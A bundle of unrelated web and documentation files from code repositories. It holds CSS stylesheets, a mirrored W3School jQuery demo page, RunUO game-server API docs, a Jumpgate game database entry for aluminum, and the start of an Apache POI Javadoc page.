font-family: "klavika-web-n4","klavika-web",sans-serif;
font-style: normal;
font-weight: 400;
}
span.tags a {
margin-right:7px;
}
span.tags a:link {
text-decoration:none;
}
span.tags a:visited {
text-decoration:none;
}
span.tags a:hover {
text-decoration:none;
border-bottom: 1px solid rgba(26, 26, 26, 1);
background-color:rgba(0, 0, 0, 0.05);
}
span.tags a:active {
text-decoration:none;
}
.phone-date {
display:none;
}
/* ---------------- responsive ---------------- */
@media screen and (max-width: 1200px) {
#dhtmltooltip{
font-size: 48px;
font-family: "klavika-web-n7","klavika-web",sans-serif;
font-style: normal;
font-weight: 700;
color:rgba(256,256,256,1);
}
}
@media screen and (min-width: 1025px) {
h5 {
display:block;
font-size: 1em;
}
.work-meta-text {
display:block;
font-size: 0.85em;
margin-left:0px;
width:100%;
}
p {
font-size: 1.2em;
line-height:1.4em;
}
}
@media screen and (max-width: 1024px) {
h5 {
display:block;
font-size: 1.15em;
margin-left:3.125%;
}
}
@media screen and (max-width: 800px) {
.nav {
display:none;
}
h3 {
margin-bottom:2.4725274725274726%;
}
h3 {
margin-left:4.444444444444445%;
width:91.2%;
margin-bottom:1%;
}
h4 {
margin-bottom:2.4725274725274726%;
}
h5 {
display:block;
font-size: 1.15em;
padding-top:0px !important;
margin-left:4.444444444444444%
}
h6 {
font-size: 1.3em;
margin-top:1em;
margin-bottom:1em;
}
.wp-caption-dd {
font-size:1.2em;
}
.work-meta-text {
display:block;
font-size:0.85em;
margin-left:4.444444444444445%;
width:91.11111111111111%;
}
.phone-date {
display:block;
font-size:1.1em;
margin-top:0px;
font-family: "klavika-web-n4","klavika-web",sans-serif;
font-style: normal;
font-weight: 400;
margin-bottom:1.5%;
color:rgba(128,128,128,1);
margin-left:4.444444444444445%;
}
.alignleft {
font-size:0.9em;
}
}
@media screen and (max-width: 625px) {
h1 {
margin-left:29%;
}
.bar-button-category h1 {
margin-left:0%;
}
p {
font-size: 1.0em;
line-height:1.5em;
}
.wp-caption {
margin-top:-1%;
margin-bottom:8%;
font-size: 0.9em;
line-height:1.1em;
}
}
@media screen and (max-width: 500px) {
.work-meta-text, .meta-tags, .work-meta-list-container {
width:100%;
margin-left:0%;
margin-right:0%;
}
h1, h1.about, h1.contact {
text-align:center;
margin-left:0%;
}
.phone-date {
margin-bottom:4%;
margin-left:0px;
font-size:1em;
margin-bottom:2%;
}
h3 {
margin-left:0%;
font-size:1.4em;
}
h2 {
text-align:center;
margin-left:0%;
float:none;
}
.category-title-left {
display:none;
}
h4 {
margin-bottom:6.666666666666667%;
}
h5 {
margin-left:0px;
margin-bottom:16px;
}
h6 {
font-size: 1em;
}
.wp-caption-dd {
font-size:0.9em;
}
} |
Coding/W3School/W3CN/www.w3school.com.cn/tiy/t9848.html | platinhom/ManualHom | <!DOCTYPE html>
<html lang="zh-cn">
<!-- Mirrored from www.w3school.com.cn/tiy/t.asp?f=jquery_prop_jquery_fx_off by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 02 Dec 2015 05:52:12 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=GB2312" /><!-- /Added by HTTrack -->
<head>
<meta charset="utf-8" />
<meta name="robots" content="all" />
<meta name="author" content="w3school.com.cn" />
<link rel="stylesheet" type="text/css" href="tc.css" />
<title>W3School在线测试工具 V2</title>
</head>
<body id="editor">
<div id="wrapper">
<div id="header">
<h1>W3School TIY</h1>
<div id="ad">
<script type="text/javascript"><!--
google_ad_client = "pub-3381531532877742";
/* 728x90, tiy_big */
google_ad_slot = "7947784850";
google_ad_width = 728;
google_ad_height = 90;
//-->
</script>
<script type="text/javascript"
src="../../pagead2.googlesyndication.com/pagead/f.txt">
</script>
</div>
</div>
<form action="http://www.w3school.com.cn/tiy/v.asp" method="post" id="tryitform" name="tryitform" onSubmit="validateForm();" target="i">
<div id="butt">
<input type="button" value="提交代码" onClick="submitTryit()">
</div>
<div id="CodeArea">
<h2>编辑您的代码:</h2>
<textarea id="TestCode" wrap="logical">
<!DOCTYPE html>
<html>
<head>
<script src="../jquery/jquery-1.11.1.min.js">
</script>
<script>
$(document).ready(function(){
$("#disable").click(function(){
jQuery.fx.off = true;
});
$("#enable").click(function(){
jQuery.fx.off = false;
});
$("#toggle").click(function(){
$("div").toggle("slow");
});
});
</script>
</head>
<body>
<button id="disable">jQuery.fx.off = true ( 禁用 )</button>
<button id="enable">jQuery.fx.off = false ( 启用 )</button>
<br><br>
<button id="toggle">切换动画</button>
<div style="background:#98bf21;height:100px;width:100px;margin:50px;">
</div>
</body>
<!-- Mirrored from www.w3school.com.cn/tiy/t.asp?f=jquery_prop_jquery_fx_off by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 02 Dec 2015 05:52:12 GMT -->
</html>
</textarea>
</div>
<input type="hidden" id="code" name="code" />
<input type="hidden" id="bt" name="bt" />
</form>
<div id="result">
<h2>查看结果:</h2>
<iframe frameborder="0" name="i" src="loadtext9848.html?f=jquery_prop_jquery_fx_off"></iframe>
</div>
<div id="footer">
<p>请在上面的文本框中编辑您的代码,然后单击提交按钮测试结果。<a href="../index-2.html" title="W3School 在线教程">w3school.com.cn</a></p>
</div>
</div>
<script type="text/javascript">
function submitTryit()
{
var t=document.getElementById("TestCode").value;
t=t.replace(/=/gi,"w3equalsign");
t=t.replace(/script/gi,"w3scrw3ipttag");
document.getElementById("code").value=t;
document.getElementById("tryitform").action="v.html";
validateForm();
document.getElementById("tryitform").submit();
}
function validateForm()
{
var code=document.getElementById("code").value;
if (code.length>5000)
{
document.getElementById("code").value="<h1>Error</h1>";
}
}
</script>
</body>
</html> |
modules/mod_zt_news/assets/css/latestnews.css | Jogajook/good-guitar | div.latestnews {
margin: 0;
padding: 0;
list-style: none;
background: none;
display: inline-block;
}
div.latestnewsitems {
margin: 0 0 10px;
padding: 0;
display: block;
float: left;
}
div.latestnewsitems img {
margin: 2px 5px 0 0;
padding: 2px;
background: #dadada;
}
div.latestnewsitems img.left {
float: left;
}
div.latestnewsitems img.right {
float: right;
}
div.latestnewsitems h4 {
margin: 0.5em 0 0;
} |
docs/types/Log.html | alucardxlx/matts-uo-server | <html>
<head>
<title>RunUO Documentation - Class Overview - Log</title>
</head>
<body bgcolor="white" style="font-family: Courier New" text="#000000" link="#000000" vlink="#000000" alink="#808080">
<h4><a href="../namespaces/Server.Items.html">Back to Server.Items</a></h4>
<h2>Log : <!-- DBG-1 --><a href="Item.html">Item</a>, <!-- DBG-2.2 --><a href="IHued.html">IHued</a>, <!-- DBG-2.1 --><font color="blue">IComparable</font><<a href="Item.html">Item</a>>, <!-- DBG-2.2 --><a href="ISerializable.html">ISerializable</a>, <!-- DBG-2.2 --><a href="ISpawnable.html">ISpawnable</a>, <!-- DBG-2.2 --><a href="IEntity.html">IEntity</a>, <!-- DBG-2.2 --><a href="IPoint3D.html">IPoint3D</a>, <!-- DBG-2.2 --><a href="IPoint2D.html">IPoint2D</a>, <!-- DBG-2.1 --><font color="blue">IComparable</font>, <!-- DBG-2.1 --><font color="blue">IComparable</font><<a href="IEntity.html">IEntity</a>>, <!-- DBG-2.2 --><a href="ICommodity.html">ICommodity</a>, <!-- DBG-2.2 --><a href="IAxe.html">IAxe</a></h2>
<h4>Derived Types: <!-- DBG-3 --><a href="AshLog.html">AshLog</a>, <!-- DBG-3 --><a href="BloodwoodLog.html">BloodwoodLog</a>, <!-- DBG-3 --><a href="FrostwoodLog.html">FrostwoodLog</a>, <!-- DBG-3 --><a href="HeartwoodLog.html">HeartwoodLog</a>, <!-- DBG-3 --><a href="OakLog.html">OakLog</a>, <!-- DBG-3 --><a href="YewLog.html">YewLog</a></h4>
(<font color="blue">ctor</font>) Log()<br>
(<font color="blue">ctor</font>) Log( <!-- DBG-0 --><a href="Serial.html">Serial</a> serial )<br>
(<font color="blue">ctor</font>) Log( <!-- DBG-0 --><a href="CraftResource.html">CraftResource</a> resource )<br>
(<font color="blue">ctor</font>) Log( <font color="blue">int</font> amount )<br>
(<font color="blue">ctor</font>) Log( <!-- DBG-0 --><a href="CraftResource.html">CraftResource</a> resource, <font color="blue">int</font> amount )<br>
<!-- DBG-0 --><a href="CraftResource.html">CraftResource</a> Resource( <font color="blue">get</font>; <font color="blue">set</font>; )<br>
<font color="blue">int</font> Server.Items.ICommodity.DescriptionNumber( <font color="blue">get</font>; )<br>
<font color="blue">bool</font> Server.Items.ICommodity.IsDeedable( <font color="blue">get</font>; )<br>
<font color="blue">virtual</font> <font color="blue">bool</font> Axe( <!-- DBG-0 --><a href="Mobile.html">Mobile</a> from, <!-- DBG-0 --><a href="BaseAxe.html">BaseAxe</a> axe )<br>
<font color="blue">virtual</font> <font color="blue">void</font> Deserialize( <!-- DBG-0 --><a href="GenericReader.html">GenericReader</a> reader )<br>
<font color="blue">virtual</font> <font color="blue">void</font> GetProperties( <!-- DBG-0 --><a href="ObjectPropertyList.html">ObjectPropertyList</a> list )<br>
<font color="blue">virtual</font> <font color="blue">void</font> Serialize( <!-- DBG-0 --><a href="GenericWriter.html">GenericWriter</a> writer )<br>
<font color="blue">virtual</font> <font color="blue">bool</font> TryCreateBoards( <!-- DBG-0 --><a href="Mobile.html">Mobile</a> from, <font color="blue">double</font> skill, <!-- DBG-0 --><a href="Item.html">Item</a> item )<br>
</body>
</html>
|
public/www/commodities/Aluminum.html | prgra/jgshop | <HTML>
<HEAD>
<META NAME="Author" CONTENT="web front end by Fourmula - http://www.fourmula.com">
<META NAME="Developer" CONTENT="jumpgate developed by NetDevil - http://www.netdevil.com">
<TITLE>Jumpgate - Database:Commodities:Aluminum</TITLE>
<LINK REL=stylesheet TYPE="text/css" HREF="../../in_game.css">
</HEAD>
<SCRIPT LANGUAGE="JavaScript">
var isIE = navigator.appName.indexOf("Microsoft") != -1;
function updateLocation()
{
if (top.JG_top && top.JG_top.exists)
{
top.JG_top.updateLocation(2,"database");
top.JG_top.updateLocation(3,"commodities");
}
}
</SCRIPT>
<BODY BACKGROUND="../../media/background.gif" onLoad="updateLocation();">
<!-- BEGIN CONTENT -->
<!-- INSERT AD -->
<H1 ALIGN="RIGHT">technical specifications </H1>
<BR CLEAR="ALL">
<CENTER>
<!-- BEGIN DESCRIPTION -->
<TABLE CELLPADDING="3" CELLSPACING="1" BORDER="0" BGCOLOR="#222222" ALIGN="CENTER" WIDTH="500">
<TR ALIGN="CENTER" VALIGN="TOP">
<TD BGCOLOR="#334466" COLSPAN="7"><FONT SIZE="+1"><B>"Aluminum"</B></FONT></TD>
</TR>
<TR ALIGN="CENTER" VALIGN="MIDDLE">
<TD ROWSPAN="3" COLSPAN="2" BGCOLOR="#000000" WIDTH="120"><OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
codebase="http://active.macromedia.com/flash2/cabs/swflash.cab#version=3,0,0,0"
ID="media/object" WIDTH="100" HEIGHT="110">
<PARAM NAME="movie" VALUE="media/aluminum.swf">
<PARAM NAME="quality" VALUE="high">
<PARAM NAME="menu" VALUE="false">
<PARAM NAME="bgcolor" VALUE="#000000">
<EMBED SRC="media/aluminum.swf" swLiveConnect="FALSE" WIDTH="100" HEIGHT="110"
QUALITY="high" MENU="false" BGCOLOR="#000000" TYPE="application/x-shockwave-flash" PLUGINSPAGE="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" >
</EMBED></OBJECT><BR>
<FONT SIZE="-2">image not to scale</FONT><BR>
</TD>
</TR>
<TR BGCOLOR="#222222" ALIGN="CENTER" VALIGN="TOP">
<TD BGCOLOR="#222222" ROWSPAN="2"><IMG SRC="../../media/pixel.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER="0"></TD>
<TD BGCOLOR="#444444"><B>Trivalent Metallic Element</B></TD>
<TD BGCOLOR="#222222" ROWSPAN="2"><IMG SRC="../../media/pixel.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER="0"></TD>
</TR>
<TR BGCOLOR="#000000" VALIGN="TOP" ALIGN="RIGHT">
<TD BGCOLOR="#222222" ALIGN="LEFT"><FONT SIZE="-1">Aluminum is a strongly gravipositive metal and extremely reactive. Materials made of aluminum do not tarnish or rust. Its high strength-to-weight ratio makes aluminum useful in the construction of spacecraft, g-based transports, satellites, and other applications in which mobility and energy conservation are important.</FONT><BR>
</TD>
</TR>
</TABLE>
<BR CLEAR="ALL">
<!-- END DESCRIPTION -->
<!-- BEGIN SPECS -->
<TABLE CELLPADDING=5 CELLSPACING=1 BORDER=0 BGCOLOR="#222222" ALIGN="CENTER" WIDTH="500">
<TR BGCOLOR="#000000" VALIGN="TOP" ALIGN="RIGHT">
<TD ROWSPAN="15" BGCOLOR="#222222"> </TD>
<TD BGCOLOR="#222222" COLSPAN="3"><IMG SRC="../../media/pixel.gif" WIDTH=1 HEIGHT=5 ALT="" BORDER="0"></TD>
</TR>
<TR BGCOLOR="#000000" VALIGN="TOP" ALIGN="RIGHT">
<TD CLASS="statcat" WIDTH="300">Production Center(s):</TD>
<TD CLASS="statgood">Mined</TD>
</TR>
<TR BGCOLOR="#000000" VALIGN="TOP" ALIGN="RIGHT">
<TD CLASS="statcat" WIDTH="300"> CodeName:</TD>
<TD CLASS="statgood">Aluminum</TD>
</TR>
<TR BGCOLOR="#000000" VALIGN="TOP" ALIGN="RIGHT">
<TD CLASS="statcat" WIDTH="300"> Classification:</TD>
<TD CLASS="statgood">Trivalent Metallic Element</TD>
</TR>
<TR BGCOLOR="#000000" VALIGN="TOP" ALIGN="RIGHT">
<TD CLASS="statcat" WIDTH="300"> TechLevel:</TD>
<TD CLASS="statgood">0</TD>
</TR>
<TR BGCOLOR="#000000" VALIGN="TOP" ALIGN="RIGHT">
<TD CLASS="statcat" WIDTH="300"> ID:</TD>
<TD CLASS="statgood">Al</TD>
</TR>
<TR BGCOLOR="#000000" VALIGN="TOP" ALIGN="RIGHT">
<TD CLASS="statcat" WIDTH="300"> Mass(kg):</TD>
<TD CLASS="statgood">2,702</TD>
</TR>
<TR BGCOLOR="#000000" VALIGN="TOP" ALIGN="RIGHT">
<TD CLASS="statcat" WIDTH="300"> Melting Point(gC):</TD>
<TD CLASS="statgood">660°</TD>
</TR>
<TR BGCOLOR="#000000" VALIGN="TOP" ALIGN="RIGHT">
<TD CLASS="statcat" WIDTH="300"> Gravitic Sig(ngF):</TD>
<TD CLASS="statgood">2.7</TD>
</TR>
<TR BGCOLOR="#000000" VALIGN="TOP" ALIGN="LEFT">
<TD CLASS="statcat">Required Components:</TD>
<TD CLASS="statgood"><FONT SIZE="-2">N/A</FONT></TD>
</TR>
</TABLE>
<BR CLEAR="ALL">
<!-- END SPECS -->
<!-- Updated From Database on Fri Jun 28 10:37:36 MDT 2002 -->
</CENTER>
<!-- END CONTENT -->
</BODY>
</HTML>
|
lib/docs/apidocs/org/apache/poi/hsmf/datatypes/RecipientChunks.html | setu9760/Jade_project_repo | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="ru">
<head>
<title>RecipientChunks (POI API Documentation)</title>
<link rel="stylesheet" type="text/css" href="../../../../../stylesheet.css" title="Style">
</head>
<body>
<script type="text/javascript"><!--
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="RecipientChunks (POI API Documentation)";
}
//-->
</script>
<noscript>
<div>JavaScript is disabled on your browser.</div>
</noscript>
<!-- ========= START OF TOP NAVBAR ======= -->
<div class="topNav"><a name="navbar_top">
<!-- -->
</a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../../../overview-summary.html">Overview</a></li>
<li><a href="package-summary.html">Package</a></li>
<li class="navBarCell1Rev">Class</li>
<li><a href="class-use/RecipientChunks.html">Use</a></li>
<li><a href="package-tree.html">Tree</a></li>
<li><a href="../../../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../../../index-all.html">Index</a></li>
<li><a href="../../../../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li><a href="../../../../../org/apache/poi/hsmf/datatypes/PropertyValue.TimePropertyValue.html" title="class in org.apache.poi.hsmf.datatypes"><span class="strong">Prev Class</span></a></li>
<li><a href="../../../../../org/apache/poi/hsmf/datatypes/RecipientChunks.RecipientChunksSorter.html" title="class in org.apache.poi.hsmf.datatypes"><span class="strong">Next Class</span></a></li>
</ul>
<ul class="navList">
<li><a href="../../../../../index.html?org/apache/poi/hsmf/datatypes/RecipientChunks.html" target="_top">Frames</a></li>
<li><a href="RecipientChunks.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_top">
<li><a href="../../../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_top");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<div>
<ul class="subNavList">
<li>Summary: </li>
<li><a href="#nested_class_summary">Nested</a> | </li>
<li><a href="#field_summary">Field</a> | </li>
<li><a href="#constructor_summary">Constr</a> | </li>
<li><a href="#method_summary">Method</a></li>
</ul>
<ul class="subNavList">
<li>Detail: </li>
<li><a href="#field_detail">Field</a> | </li>
<li><a href="#constructor_detail">Constr</a> | </li>
<li><a href="#method_detail">Method</a></li>
</ul>
</div>
<a name="skip-navbar_top">
<!-- -->
</a></div>
<!-- ========= END OF TOP NAVBAR ========= -->
<!-- ======== START OF CLASS DATA ======== -->
<div class="header">
<div class="subTitle">org.apache.poi.hsmf.datatypes</div>
<h2 title="Class RecipientChunks" class="title">Class RecipientChunks</h2>
</div>
<div class="contentContainer">
<ul class="inheritance">
<li>java.lang.Object</li>
<li>
<ul class="inheritance">
<li>org.apache.poi.hsmf.datatypes.RecipientChunks</li>
</ul>
</li>
</ul>
<div class="description">
<ul class="blockList">
<li class="blockList">
<dl>
<dt>All Implemented Interfaces:</dt>
<dd><a href="../../../../../org/apache/poi/hsmf/datatypes/ChunkGroup.html" title="interface in org.apache.poi.hsmf.datatypes">ChunkGroup</a>, <a href="../../../../../org/apache/poi/hsmf/datatypes/ChunkGroupWithProperties.html" title="interface in org.apache.poi.hsmf.datatypes">ChunkGroupWithProperties</a></dd>
</dl>
<hr>
<br>
<pre>public final class <span class="strong">RecipientChunks</span>
extends java.lang.Object
implements <a href="../../../../../org/apache/poi/hsmf/datatypes/ChunkGroupWithProperties.html" title="interface in org.apache.poi.hsmf.datatypes">ChunkGroupWithProperties</a></pre>
<div class="block">Collection of convenience chunks for the
Recip(ient) part of an outlook file.
If a message has multiple recipients, there will be
several of these.</div>
</li>
</ul>
</div>
<div class="summary">
<ul class="blockList">
<li class="blockList">
<!-- ======== NESTED CLASS SUMMARY ======== -->
<ul class="blockList">
<li class="blockList"><a name="nested_class_summary">
<!-- -->
</a>
<h3>Nested Class Summary</h3>
<table class="overviewSummary" border="0" cellpadding="3" cellspacing="0" summary="Nested Class Summary table, listing nested classes, and an explanation">
<caption><span>Nested Classes</span><span class="tabEnd"> </span></caption>
<tr>
<th class="colFirst" scope="col">Modifier and Type</th>
<th class="colLast" scope="col">Class and Description</th>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static class </code></td>
<td class="colLast"><code><strong><a href="../../../../../org/apache/poi/hsmf/datatypes/RecipientChunks.RecipientChunksSorter.html" title="class in org.apache.poi.hsmf.datatypes">RecipientChunks.RecipientChunksSorter</a></strong></code>
<div class="block">Orders by the recipient number.</div>
</td>
</tr>
</table>
</li>
</ul>
<!-- =========== FIELD SUMMARY =========== -->
<ul class="blockList">
<li class="blockList"><a name="field_summary">
<!-- -->
</a>
<h3>Field Summary</h3>
<table class="overviewSummary" border="0" cellpadding="3" cellspacing="0" summary="Field Summary table, listing fields, and an explanation">
<caption><span>Fields</span><span class="tabEnd"> </span></caption>
<tr>
<th class="colFirst" scope="col">Modifier and Type</th>
<th class="colLast" scope="col">Field and Description</th>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static <a href="../../../../../org/apache/poi/hsmf/datatypes/MAPIProperty.html" title="class in org.apache.poi.hsmf.datatypes">MAPIProperty</a></code></td>
<td class="colLast"><code><strong><a href="../../../../../org/apache/poi/hsmf/datatypes/RecipientChunks.html#DELIVERY_TYPE">DELIVERY_TYPE</a></strong></code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code><a href="../../../../../org/apache/poi/hsmf/datatypes/StringChunk.html" title="class in org.apache.poi.hsmf.datatypes">StringChunk</a></code></td>
<td class="colLast"><code><strong><a href="../../../../../org/apache/poi/hsmf/datatypes/RecipientChunks.html#deliveryTypeChunk">deliveryTypeChunk</a></strong></code>
<div class="block">Normally EX or SMTP.</div>
</td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static java.lang.String</code></td>
<td class="colLast"><code><strong><a href="../../../../../org/apache/poi/hsmf/datatypes/RecipientChunks.html#PREFIX">PREFIX</a></strong></code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static <a href="../../../../../org/apache/poi/hsmf/datatypes/MAPIProperty.html" title="class in org.apache.poi.hsmf.datatypes">MAPIProperty</a></code></td>
<td class="colLast"><code><strong><a href="../../../../../org/apache/poi/hsmf/datatypes/RecipientChunks.html#RECIPIENT_DISPLAY_NAME">RECIPIENT_DISPLAY_NAME</a></strong></code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static <a href="../../../../../org/apache/poi/hsmf/datatypes/MAPIProperty.html" title="class in org.apache.poi.hsmf.datatypes">MAPIProperty</a></code></td>
<td class="colLast"><code><strong><a href="../../../../../org/apache/poi/hsmf/datatypes/RecipientChunks.html#RECIPIENT_EMAIL_ADDRESS">RECIPIENT_EMAIL_ADDRESS</a></strong></code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static <a href="../../../../../org/apache/poi/hsmf/datatypes/MAPIProperty.html" title="class in org.apache.poi.hsmf.datatypes">MAPIProperty</a></code></td>
<td class="colLast"><code><strong><a href="../../../../../org/apache/poi/hsmf/datatypes/RecipientChunks.html#RECIPIENT_NAME">RECIPIENT_NAME</a></strong></code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>static <a href="../../../../../org/apache/poi/hsmf/datatypes/MAPIProperty.html" title="class in org.apache.poi.hsmf.datatypes">MAPIProperty</a></code></td>
<td class="colLast"><code><strong><a href="../../../../../org/apache/poi/hsmf/datatypes/RecipientChunks.html#RECIPIENT_SEARCH">RECIPIENT_SEARCH</a></strong></code> </td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>static <a href="../../../../../org/apache/poi/hsmf/datatypes/MAPIProperty.html" title="class in org.apache.poi.hsmf.datatypes">MAPIProperty</a></code></td>
<td class="colLast"><code><strong><a href="../../../../../org/apache/poi/hsmf/datatypes/RecipientChunks.html#RECIPIENT_SMTP_ADDRESS">RECIPIENT_SMTP_ADDRESS</a></strong></code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code><a href="../../../../../org/apache/poi/hsmf/datatypes/StringChunk.html" title="class in org.apache.poi.hsmf.datatypes">StringChunk</a></code></td>
<td class="colLast"><code><strong><a href="../../../../../org/apache/poi/hsmf/datatypes/RecipientChunks.html#recipientDisplayNameChunk">recipientDisplayNameChunk</a></strong></code>
<div class="block">The display name of the recipient.</div>
</td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code><a href="../../../../../org/apache/poi/hsmf/datatypes/StringChunk.html" title="class in org.apache.poi.hsmf.datatypes">StringChunk</a></code></td>
<td class="colLast"><code><strong><a href="../../../../../org/apache/poi/hsmf/datatypes/RecipientChunks.html#recipientEmailChunk">recipientEmailChunk</a></strong></code>
<div class="block">The email address of the recipient, which
could be in SMTP or SEARCH format, but
isn't always present...</div>
</td>
</tr>
<tr class="altColor">
<td class="colFirst"><code><a href="../../../../../org/apache/poi/hsmf/datatypes/StringChunk.html" title="class in org.apache.poi.hsmf.datatypes">StringChunk</a></code></td>
<td class="colLast"><code><strong><a href="../../../../../org/apache/poi/hsmf/datatypes/RecipientChunks.html#recipientNameChunk">recipientNameChunk</a></strong></code>
<div class="block">The "name", which could be their name if an
internal person, or their email address
if an external person</div>
</td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>int</code></td>
<td class="colLast"><code><strong><a href="../../../../../org/apache/poi/hsmf/datatypes/RecipientChunks.html#recipientNumber">recipientNumber</a></strong></code>
<div class="block">Our 0 based position in the list of recipients</div>
</td>
</tr>
<tr class="altColor">
<td class="colFirst"><code><a href="../../../../../org/apache/poi/hsmf/datatypes/ByteChunk.html" title="class in org.apache.poi.hsmf.datatypes">ByteChunk</a></code></td>
<td class="colLast"><code><strong><a href="../../../../../org/apache/poi/hsmf/datatypes/RecipientChunks.html#recipientSearchChunk">recipientSearchChunk</a></strong></code>
<div class="block">TODO</div>
</td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code><a href="../../../../../org/apache/poi/hsmf/datatypes/StringChunk.html" title="class in org.apache.poi.hsmf.datatypes">StringChunk</a></code></td>
<td class="colLast"><code><strong><a href="../../../../../org/apache/poi/hsmf/datatypes/RecipientChunks.html#recipientSMTPChunk">recipientSMTPChunk</a></strong></code>
<div class="block">The smtp destination email address of
the recipient, but isn't always present...</div>
</td>
</tr>
</table>
</li>
</ul>
<!-- ======== CONSTRUCTOR SUMMARY ======== -->
<ul class="blockList">
<li class="blockList"><a name="constructor_summary">
<!-- -->
</a>
<h3>Constructor Summary</h3>
<table class="overviewSummary" border="0" cellpadding="3" cellspacing="0" summary="Constructor Summary table, listing constructors, and an explanation">
<caption><span>Constructors</span><span class="tabEnd"> </span></caption>
<tr>
<th class="colOne" scope="col">Constructor and Description</th>
</tr>
<tr class="altColor">
<td class="colOne"><code><strong><a href="../../../../../org/apache/poi/hsmf/datatypes/RecipientChunks.html#RecipientChunks(java.lang.String)">RecipientChunks</a></strong>(java.lang.String name)</code> </td>
</tr>
</table>
</li>
</ul>
<!-- ========== METHOD SUMMARY =========== -->
<ul class="blockList">
<li class="blockList"><a name="method_summary">
<!-- -->
</a>
<h3>Method Summary</h3>
<table class="overviewSummary" border="0" cellpadding="3" cellspacing="0" summary="Method Summary table, listing methods, and an explanation">
<caption><span>Methods</span><span class="tabEnd"> </span></caption>
<tr>
<th class="colFirst" scope="col">Modifier and Type</th>
<th class="colLast" scope="col">Method and Description</th>
</tr>
<tr class="altColor">
<td class="colFirst"><code>void</code></td>
<td class="colLast"><code><strong><a href="../../../../../org/apache/poi/hsmf/datatypes/RecipientChunks.html#chunksComplete()">chunksComplete</a></strong>()</code>
<div class="block">Called by the parser when all chunks have been found.</div>
</td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code><a href="../../../../../org/apache/poi/hsmf/datatypes/Chunk.html" title="class in org.apache.poi.hsmf.datatypes">Chunk</a>[]</code></td>
<td class="colLast"><code><strong><a href="../../../../../org/apache/poi/hsmf/datatypes/RecipientChunks.html#getAll()">getAll</a></strong>()</code> </td>
</tr>
<tr class="altColor">
<td class="colFirst"><code><a href="../../../../../org/apache/poi/hsmf/datatypes/Chunk.html" title="class in org.apache.poi.hsmf.datatypes">Chunk</a>[]</code></td>
<td class="colLast"><code><strong><a href="../../../../../org/apache/poi/hsmf/datatypes/RecipientChunks.html#getChunks()">getChunks</a></strong>()</code>
<div class="block">Returns the chunks that make up the group.</div>
</td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>java.util.Map<<a href="../../../../../org/apache/poi/hsmf/datatypes/MAPIProperty.html" title="class in org.apache.poi.hsmf.datatypes">MAPIProperty</a>,java.util.List<<a href="../../../../../org/apache/poi/hsmf/datatypes/PropertyValue.html" title="class in org.apache.poi.hsmf.datatypes">PropertyValue</a>>></code></td>
<td class="colLast"><code><strong><a href="../../../../../org/apache/poi/hsmf/datatypes/RecipientChunks.html#getProperties()">getProperties</a></strong>()</code>
<div class="block">Returns all the Properties contained in the Chunk, along
with their Values.</div>
</td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>java.lang.String</code></td>
<td class="colLast"><code><strong><a href="../../../../../org/apache/poi/hsmf/datatypes/RecipientChunks.html#getRecipientEmailAddress()">getRecipientEmailAddress</a></strong>()</code>
<div class="block">Tries to find their email address, in
whichever chunk holds it given the
delivery type.</div>
</td>
</tr>
<tr class="rowColor">
<td class="colFirst"><code>java.lang.String</code></td>
<td class="colLast"><code><strong><a href="../../../../../org/apache/poi/hsmf/datatypes/RecipientChunks.html#getRecipientName()">getRecipientName</a></strong>()</code>
<div class="block">Tries to find their name,
in whichever chunk holds it.</div>
</td>
</tr>
<tr class="altColor">
<td class="colFirst"><code>void</code></td>
<td class="colLast"><code><strong><a href="../../../../../org/apache/poi/hsmf/datatypes/RecipientChunks.html#record(org.apache.poi.hsmf.datatypes.Chunk)">record</a></strong>(<a href="../../../../../org/apache/poi/hsmf/datatypes/Chunk.html" title="class in org.apache.poi.hsmf.datatypes">Chunk</a> chunk)</code>
<div class="block">Called by the parser whenever a chunk is found.</div>
</td>
</tr>
</table>
<ul class="blockList">
<li class="blockList"><a name="methods_inherited_from_class_java.lang.Object">
<!-- -->
</a>
<h3>Methods inherited from class java.lang.Object</h3>
<code>clone, equals, finalize, getClass, hashCode, notify, notifyAll, toString, wait, wait, wait</code></li>
</ul>
</li>
</ul>
</li>
</ul>
</div>
<div class="details">
<ul class="blockList">
<li class="blockList">
<!-- ============ FIELD DETAIL =========== -->
<ul class="blockList">
<li class="blockList"><a name="field_detail">
<!-- -->
</a>
<h3>Field Detail</h3>
<a name="PREFIX">
<!-- -->
</a>
<ul class="blockList">
<li class="blockList">
<h4>PREFIX</h4>
<pre>public static final java.lang.String PREFIX</pre>
